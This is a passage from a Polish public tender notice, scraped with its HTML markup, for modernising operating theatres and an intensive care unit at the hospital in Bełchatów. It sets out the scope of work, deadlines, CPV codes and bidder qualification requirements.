specyfikacjami technicznymi wykonania i odbioru robót budowlanych, BIOZ, pozwoleniami na budowę wydanymi przez Starostę Bełchatowskiego (decyzje nr: 1189.2016 z 23.11.2016 r., 1190.2016 z 23.11.2016 r., 1191.2016 z 23.11.2016 r., 1192.2016 z 23.11.2016 r. - stanowią Załącznik nr 14 do SIWZ) oraz ustaleniami dokonanymi z Zamawiającym w trakcie wykonywania robot budowlanych. Wykonane prace budowlane muszą być realizowane zgodnie z obowiązującym prawem, a w szczególności z:a)	ustawą z dnia 7 lipca 1994 r. Prawo budowlane,b)	ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych,c)	rozporządzeniem Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą, d)	przepisami wykonawczymi do w/w ustaw, oraz innymi obowiązującymi przepisami prawnymi związanymi z realizowaną inwestycją. 6) W zakres przedmiotu zamówienia wchodzą także:a)	Wykonanie dokumentacji powykonawczej w ilości trzech egzemplarzy w wersji papierowej i w jednym egzemplarzu wersji elektronicznej na płycie CD w formacie edytowalnym "doc" i "pdf" dla części opisowej, oraz "dwg" i "pdf" dla rysunków.b)	Przekazanie Zamawiającemu certyfikatów zastosowanych materiałów oraz kart gwarancyjnych.c)	Przekazanie Zamawiającemu Certyfikatów Energetycznych.d)	Zorganizowanie i przeprowadzenie prób badań i odbiorów wykonanych instalacji wraz z przekazaniem Zamawiającemu dokumentacji.e)	Opracowanie i przekazanie Zamawiającemu instrukcji obsługi i konserwacji instalacji i zainstalowanych w obiekcie urządzeń. Przeprowadzenie szkoleń personelu który wskaże Zamawiający.f)	Przygotowanie w imieniu Zamawiającego wniosków wraz z załącznikami wymaganymi Prawem budowlanym o zakończeniu budowy oraz uzyskanie ostatecznej decyzji o pozwoleniu na użytkowanie.g)	Załączony przez Zamawiającego przedmiar robót i kosztorys nakładczy należy traktować jako dokumenty pomocnicze przy określaniu ceny oferty. Ponadto należy go interpretować łącznie z pozostałą częścią dokumentacji technicznej przekazanej Wykonawcy. W przypadku jakichkolwiek wątpliwości pomiędzy projektami budowlanymi a przedmiarami, bezwzględne pierwszeństwo należy przyznać projektom budowlanym. Wobec powyższego istnieje konieczność wykonania robót z dokumentacji projektowej, które mogły nie zostać ujęte w przedmiarze lub zostały ujęte w mniejszym zakresie. Opisany przedmiot zamówienia za pomocą załączonych dokumentacji projektowych oraz obowiązujących zasad wiedzy technicznej obliguje Wykonawcę do osiągnięcia zakładanego rezultatu (zrealizowania wszystkich robót budowlanych zakończonych odbiorami końcowymi wraz z pozwoleniami na użytkowanie). 7) Zamawiający wskazuje na możliwość udzielenia dotychczasowemu wykonawcy robót budowlanych zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, w zakresie do 1 000 000,00 zł netto. Warunki na jakich zostaną udzielone przedmiotowe zamówienia:a) w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel;b) w trybie zamówienia z wolnej ręki po negocjacjach z dotychczasowym wykonawcą robót budowlanych;c) z uwzględnieniem warunków technicznych i organizacyjnych obowiązujących przy realizacji zamówienia podstawowego, o ile uwzględnienie tych warunków będzie niezbędne do prawidłowego tj. zgodnego z przeznaczeniem i zamierzeniem budowlanym, wykonania zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.	8) Zamawiający wymaga, aby realizacja przedmiotu zamówienia uwzględniała wymagania projektowania z przeznaczeniem dla wszystkich użytkowników oraz wymagania w zakresie dostępności dla osób niepełnosprawnych.9) Inne szczegółowe wymagania Zamawiającego, które Wykonawca zobowiązany jest uwzględnić przy realizacji zamówienia, dotyczące:	a)	zasad i organizacji wykonywanych prac określa Załącznik nr 2a do SIWZ; b)	zasad odbioru robót budowlanych określa Załącznik nr 2b do SIWZ; c)	dodatkowych wymagań dotyczących elementów wyposażenia określa Załącznik nr 2c do SIWZ.4.	Wymagania dotyczące zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia:1) Rodzaj czynności, których dotyczą wymagania zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w trakcie	realizacji zamówienia jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 par. 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j.: Dz.U. z 2016 r. poz. 1666, z poźn. zm.): czynności pracowników bezpośrednio nadzorujących realizację robót budowlanych (np.: brygadziści, mistrzowie, itp.), prace pracowników polegające na bezpośrednim (fizycznym) wykonywaniu robót budowlanych opisanych lub wynikających z dokumentacji projektowej i Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych.2)	Powyższy warunek zostanie spełniony poprzez zatrudnienie na umowę o pracę nowych pracowników lub wyznaczenie do realizacji zamówienia zatrudnionych już pracowników u Wykonawcy lub Podwykonawcy.3) Warunek nie dotyczy wykonywania samodzielnych funkcji technicznych w budownictwie oraz przypadku, w którym wspólnicy spółki osobowej/osoby fizyczne prowadzące działalność gospodarczą będą samodzielnie świadczyli pracę w zakresie czynności określonych w ppkt 1).4) Zamawiający zastrzega sobie możliwość kontroli sposobu zatrudnienia osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, poprzez żądanie okazania stosownych oświadczeń i/lub dokumentów. Kontrola może być przeprowadzona bez wcześniejszego uprzedzenia Wykonawcy. Na każde wezwanie Zamawiającego Wykonawca zobowiązany będzie udokumentować fakt zatrudnienia danej osoby na podstawie umowy o pracę. Szczegółowe regulacje dotyczące sposobu dokumentowania zatrudnienia osób, a także uprawnienia Zamawiającego w zakresie kontroli oraz sankcji z tym związanych, zostały zawarte we wzorze umowy stanowiącym Załącznik nr 3 do SIWZ.5. Celem niniejszego postępowania jest otrzymanie robót budowlanych o określonej w SIWZ jakości. Z tych względów Zamawiający dołożył należytej staranności, aby przedmiot zamówienia nie został opisany przez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, które mogłoby doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów. Jeżeli, pomimo tego, okaże się, że w jakimkolwiek miejscu SIWZ oraz w załącznikach do niej występują takie wskazania, nie należy ich traktować jako wymagań odnoszących się do przedmiotu zamówienia, a należy je rozpatrywać wyłącznie w kategoriach wskazań o charakterze informacyjnym (niewiążących dla wykonawców). Z tych względów oferta, która nie będzie odpowiadała takim wskazaniom nie będzie uznawana za niezgodną z treścią SIWZ i nie zostanie z tych powodów odrzucona. W takim przypadku opis przedmiotu zamówienia nawiązujący do parametrów, właściwości konkretnych wyrobów należy traktować jako przykładowy. Dlatego, Zamawiający zastrzega, że wszędzie tam gdzie w treści wszelkiej dokumentacji stanowiącej opis przedmiotu zamówienia, zostały w opisie tego przedmiotu wskazane znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, przyjmuje się, że wskazaniom takim towarzyszą wyrazy ,,lub równoważny", a Zamawiający dopuszcza metody, materiały, urządzenia, systemy, technologie itp. równoważne do przedstawionych w opisie zamówienia. Dopuszcza się więc zaproponowanie przez Wykonawcę wszelkich równoważnych odpowiedników rynkowych o właściwościach nie gorszych niż wskazane przez Zamawiającego. Parametry wskazanego standardu określają minimalne warunki techniczne, eksploatacyjne, użytkowe, jakościowe i funkcjonalne, jakie ma spełnić przedmiot zamówienia. Wskazane znaki towarowe, patenty, marki lub nazwy producenta wskazujące na pochodzenie określają jedynie klasę produktu, metody, materiałów, urządzeń, systemów, technologii itp. W ofercie można przyjąć metody, materiały, urządzenia, systemy, technologie itp. innych marek i producentów, jednako parametrach technicznych, jakościowych i właściwościach użytkowych oraz funkcjonalnych odpowiadających metodom, materiałom, urządzeniom, systemom, technologiom itp. nie gorszym od opisanych w SIWZ i jako takie spełnią minimalne wymagania w zakresie równoważności. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania Zamawiającego. W takiej sytuacji Wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia zawierającego wykaz oferowanych rozwiązań (w tym materiałów i urządzeń) równoważnych względem opisanych przez Zamawiającego (stanowiących ich odpowiedniki rynkowe) - wzór oświadczenia stanowi Załącznik nr 10 do SIWZ, a także do wykazania ich równoważności za pomocą wszelkich środków dowodowych. Zamawiający nie ogranicza Wykonawcom katalogu dowodów, za pomocą których wykazywać będą oni równoważność. Jednocześnie Zamawiający zastrzega, że w przypadku niezłożenia przez Wykonawcę wraz z ofertą oświadczenia zawierającego wykaz oferowanych rozwiązań (w tym materiałów i urządzeń) równoważnych, Zamawiający przyjmie, że oferowane przez Wykonawcę rozwiązania (w tym materiały i urządzenia) są tymi, które Zamawiający opisał w SIWZ, a Wykonawca nie zamierza przy realizacji zamówienia zastosować innych tj. równoważnych rozwiązań (w tym materiałów i urządzeń).6. Zamawiający zaleca, aby Wykonawca przed złożeniem oferty odbył wizję lokalną obiektu w siedzibie Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie, co może być pomocne do opracowania oferty ze względu na specyfikę wykonywania robót budowlanych w czynnym (funkcjonującym) obiekcie szpitalnym. Zamawiający jako termin na przeprowadzenie wizji lokalnej proponuje dni od 06-11-2017 r. do 09-11-2017 r. w godzinach 10:00 - 14:00. Zainteresowany odbyciem wizji lokalnej Wykonawca poinformuje Zamawiającego o planowanym terminie wizyty (proponowane dni i godziny jak wyżej), kontaktując się telefonicznie z Kierownikiem Działu techniczno-eksploatacyjnego (tel. 0-44 63 58 350, kom. 502 287 732) lub z Kierownikiem Sekcji inwestycji (tel. 0-44 63 58 484, kom. 507-191- 008). Zamawiający nie ponosi żadnych kosztów związanych z odbyciem wizji lokalnej przez Wykonawcę.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45100000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45200000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45215140-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111300-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45400000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111100-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262520-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45320000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45432210-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45410000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421146-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45431200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421160-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45432100-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232460-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332200-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232141-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45312311-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32000000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32400000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32410000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32421000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32423000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32424000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32500000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32520000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32521000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45314200-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45314310-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32000000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32200000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32230000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32231000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32234000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32235000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32320000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32323100-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32330000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32333100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45333000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">17831443,15</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">zł</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych, zamówienia polegającego na powtórzeniu podobnych robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego, w zakresie w jakim całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości.Zamawiający wskazuje na możliwość udzielenia dotychczasowemu wykonawcy robót budowlanych zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, w zakresie do 1 000 000,00 zł netto. Warunki na jakich zostaną udzielone przedmiotowe zamówienia:a) w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel;b) w trybie zamówienia z wolnej ręki po negocjacjach z dotychczasowym wykonawcą robót budowlanych;c) z uwzględnieniem warunków technicznych i organizacyjnych obowiązujących przy realizacji zamówienia podstawowego, o ile uwzględnienie tych warunków będzie niezbędne do prawidłowego tj. zgodnego z przeznaczeniem i zamierzeniem budowlanym, wykonania zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-11-22</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Wykonawca zobowiązany jest wykonać zamówienie w terminie do dnia 22 listopada 2018 roku. Przy czym termin 22-11-2018 r. jest terminem granicznym wykonania i odbioru wszystkich etapów robót budowlanych wchodzących w zakres przedmiotu zamówienia. Termin ten uwzględnia następujący harmonogram wykonawczy i rozliczeniowy poszczególnych etapów realizacji zamówienia:Etap I - modernizacja istniejącej sali operacyjno-zabiegowej wraz z pomieszczeniami pomocniczymi w Oddziale chirurgicznym dla dzieci, poprzez wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby bloku operacyjnego oddziału; termin realizacji: do 22-03-2018 r. - wykonanie robót budowlanych przez Wykonawcę oraz działania związane z odbiorem końcowym etapu I przedmiotu zamówienia przez Zamawiającego;Etap II - modernizacja istniejącej Sali operacyjno-zabiegowej wraz z pomieszczeniami pomocniczymi w Oddziale otorynolaryngologicznym, poprzez wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby bloku operacyjnego oddziału; termin realizacji: do 22-03-2018 r. - wykonanie robót budowlanych przez Wykonawcę oraz działania związane z odbiorem końcowym etapu II przedmiotu zamówienia przez Zamawiającego;Etap III - dostosowanie pomieszczeń Istniejącego Zakładu Rehabilitacji Leczniczej do potrzeb Oddziału anestezjologii i intensywnej terapii poprzez, wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby oddziału; termin realizacji: do 23-08-2018 r. - wykonanie robót budowlanych przez Wykonawcę oraz działania związane z odbiorem końcowym etapu III przedmiotu zamówienia przez Zamawiającego;Etap IV - rozbudowa głównego Bloku operacyjnego o powierzchnię obecnie zajmowaną przez Oddział anestezjologii i intensywnej terapii i budowę 6 sal operacyjnych, poprzez wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby głównego Bloku operacyjnego; termin realizacji: do 22-11-2018 r. - wykonanie robót budowlanych przez Wykonawcę oraz działania związane z odbiorem końcowym etapu IV przedmiotu zamówienia przez Zamawiającego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Nie dotyczy! Zamawiający nie określa w tym zakresie warunków.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Warunki w zakresie sytuacji ekonomicznej lub finansowej zostaną uznane za spełnione jeżeli wykonawca wykaże, że:a. posiada środki finansowe lub zdolność kredytową w wysokości stanowiącej równowartość kwoty co najmniej 5 000 000,00 PLN,- na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I ppkt 2.1) SIWZ;b. jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną stanowiącą równowartość kwoty co najmniej 10 000 000,00 PLN, - na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I ppkt 2.2) SIWZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunki w zakresie zdolności technicznej lub zawodowej zostaną uznane za spełnione jeżeli Wykonawca wykaże, że:a. wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminuskładania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeliokres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia o wartości każdego z nich nie mniejszej niż 15 000 000,00 PLN brutto i powierzchni wchodzącej w zakres robót każdego z tych zamówień nie mniejszej niż 1 200 m?, dotyczące: budowy, przebudowy lub rozbudowy bloku operacyjnego (co najmniej z 4 salami operacyjnymi) i oddziału anestezjologii i intensywnej terapii (liczącego co najmniej 10 stanowisk - łóżek). Przy czym prace budowlane wykonywane były w czynnym obiekcie (budynku szpitala) z etapami wykonywania robót budowlanych, zakończonych odbiorami i pozwoleniem na użytkowanie poszczególnych etapów, a zakres wykonywanych prac w ramach każdego z tych zamówień dotyczył: robót ogólnobudowlanych, instalacji elektrycznych, instalacji Wod-Kan, CO, CW, instalacji klimatyzacyjnych i wentylacyjnych, instalacji gazów medycznych; - na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I ppkt 3.1) SIWZ; b. dysponuje co najmniej po jednej osobie posiadającej następujące uprawnienia budowlane oraz następujące doświadczenie:1)	kierownik kontraktu musi posiadać:a. uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie do projektowania lub kierowania robotami budowlanymi bez ograniczeń w specjalności architektonicznej lub konstrukcyjno-budowlanej, b. minimum 2-letnie doświadczenie zawodowe na stanowisku kierownika kontraktu lub równorzędnym,c. doświadczenie w zakresie pełnienia funkcji kierownika kontraktu (Project Managera, dyrektora kontraktu) przez okres minimum 8 miesięcy przy budowie, rozbudowie lub przebudowie co najmniej dwóch obiektów budowlanych wg Polskiej Klasyfikacji Obiektów Budowlanych należących do klasy 1264 (budynki szpitali i zakładów opieki medycznej) zrealizowanych w ramach dwóch zamówień o wartości każdego z nich nie mniejszej niż 15 000 000,00 PLN brutto i powierzchni wchodzącej w zakres robót każdego z tych zamówień nie mniejszej niż 1 200 m?; 2)	kierownik budowy musi posiadać:a.	uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, b. minimum 5-letnie doświadczenie zawodowe na stanowisku kierownika budowy, c. doświadczenie w pełnieniu funkcji kierownika budowy przez okres minimum 8 miesięcy, włącznie z odbiorem końcowym, przy budowie, rozbudowie lub przebudowie co najmniej dwóch obiektów budowlanych wg Polskiej Klasyfikacji Obiektów Budowlanych należących do klasy 1264 (budynki szpitali i zakładów opieki medycznej) zrealizowanych w ramach dwóch zamówień o wartości każdego z nich nie mniejszej niż 15 000 000,00 PLN brutto i powierzchni wchodzącej w zakres robót każdego z tych zamówień nie mniejszej niż 1 200 m?, w tym co najmniej jedno w czynnym obiekcie (budynku szpitala) z etapami wykonywania robót budowlanych, zakończonych odbiorami i pozwoleniem na użytkowanie poszczególnych etapów, a zakres wykonywanych prac w ramach każdego z tych zamówień dotyczył: robót ogólnobudowlanych, instalacji elektrycznych, instalacji Wod-Kan, CO, CW, instalacji klimatyzacyjnych i wentylacyjnych, instalacji gazów medycznych; 3)	kierownik robót sanitarnych musi posiadać: a.	uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjne w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,b.	minimum 5-letnie doświadczenie zawodowe na stanowisku kierownika robót sanitarnych,c.	doświadczenie w pełnieniu funkcji kierownika robót sanitarnych przy budowie, rozbudowie lub przebudowie co najmniej dwóch obiektów budowlanych wg Polskiej Klasyfikacji Obiektów Budowlanych należących do klasy 1264 (budynki szpitali i zakładów opieki medycznej);4) kierownik robót elektrycznych musi posiadać:a.	uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,b.	minimum 5-letnie doświadczenie zawodowe na stanowisku kierownika robót elektrycznych,c.	doświadczenie w pełnieniu funkcji kierownika robót elektrycznych przy budowie, rozbudowie lub przebudowie co najmniej dwóch obiektów budowlanych wg Polskiej Klasyfikacji Obiektów Budowlanych należących do klasy 1264 (budynki szpitali i zakładów opieki medycznej);5) kierownik robót telekomunikacyjnych musi posiadać:a.	uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami w specjalności instalacyjnej w zakresie sieci, linii, instalacji i urządzeń w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą,b.	minimum 5-letnie doświadczenie zawodowe na stanowisku kierownika robót telekomunikacyjnych,c.	doświadczenie w pełnieniu funkcji kierownika robót telekomunikacyjnych przy budowie, rozbudowie lub przebudowie co najmniej dwóch obiektów budowlanych wg Polskiej Klasyfikacji Obiektów Budowlanych należących do klasy 1264 (budynki szpitali i zakładów opieki medycznej);- na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I ppkt 3.2) SIWZ.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw 